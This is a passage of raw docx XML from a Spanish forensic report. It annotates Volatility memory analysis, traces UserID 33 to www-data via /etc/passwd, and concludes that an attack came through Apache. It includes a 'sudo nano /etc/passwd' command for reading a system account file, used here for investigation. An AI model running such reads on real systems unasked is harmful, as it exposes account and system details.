      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155719938 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XVI. Comando linux_pstree.</w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC4060" w14:textId="3462E884" w:rsidR="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Analizando los datos obtenidos, encontramos un UserID</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>UserID: Identificador único asignado a un usuario de un sistema o red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 33, sabemos por defecto, </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C11" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>las acciones por usuarios registrados en el sistema son</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partir del UserID 1000, en este caso nos encontramos con 33. Posteriormente, en la captura de la memoria cache o en la captura de la memoria, investigaremos quien es el usuario 33. Buscando por internet, </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">he realizado un </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo nano /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C11" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cuál</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el UserID predefinido para el ID 33 siendo este </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, por lo que se puede reafirmar que el ataque ha sido a través del servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. De todas maneras, se recomienda probar a hacer un </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linux_recover_filesystem</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:r w:rsidR="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251765760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16ABA422" wp14:editId="34620D6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>888283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5398135" cy="739140"/>
                <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2101311197" name="Grupo 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398135" cy="739140"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398262" cy="739140"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="379568663" name="Imagen 33"/>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4086860" cy="739140"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1385608165" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4158107" y="87464"/>
                            <a:ext cx="1240155" cy="546735"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6BDF1EF1" w14:textId="2CA431DD" w:rsidR="00C9479C" w:rsidRPr="005B5EAF" w:rsidRDefault="00C9479C" w:rsidP="00C9479C">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>33</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="86" w:name="_Toc155782600"/>
                              <w:r w:rsidRPr="00F7530A">
                                <w:t>Buscando UserID</w:t>
                              </w:r>
                              <w:r w:rsidR="00501A15">
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00F7530A">
                                <w:t>33 en VM volatility.</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ABA422" id="Grupo 2" o:spid="_x0000_s1123" style="position:absolute;left:0;text-align:left;margin-left:373.85pt;margin-top:69.95pt;width:425.05pt;height:58.2pt;z-index:251765760;mso-position-horizontal:right;mso-position-horizontal-relative:margin" coordsize="53982,7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